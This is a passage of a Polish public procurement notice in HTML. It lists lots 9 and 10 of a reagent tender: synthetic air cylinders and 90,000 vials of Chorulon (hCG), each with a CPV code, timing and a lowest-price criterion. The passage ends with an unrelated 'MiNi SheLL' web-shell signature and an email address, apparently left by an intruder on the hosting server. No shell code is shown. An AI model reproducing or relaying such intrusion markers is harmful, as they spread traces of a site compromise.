<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Odczynniki specjalistyczne - powietrze syntetyczne o czystości 5.0 - 4 butle po 50 litrów..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Powietrze syntetyczne o czystości 5.0 w butli 50 litrów (gaz + usługa transportu i koszty dzierżawy butli) - 4 butle. Dostawa sukcesywnie po 1 butli po uzgodnieniu telefonicznie z Zamawiającym..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 03.02.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Odczynniki specjalistyczne - hormony do rozrodu - Chorulon (hCG) - 90 000 fiolek po 1500-5000 IU hCG..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Chorulon (hCG) IU (konfekcjonowany w fiolkach szklanych zawierających po 1500-5000 IU hCG), 90 000 fiolek..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 2.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com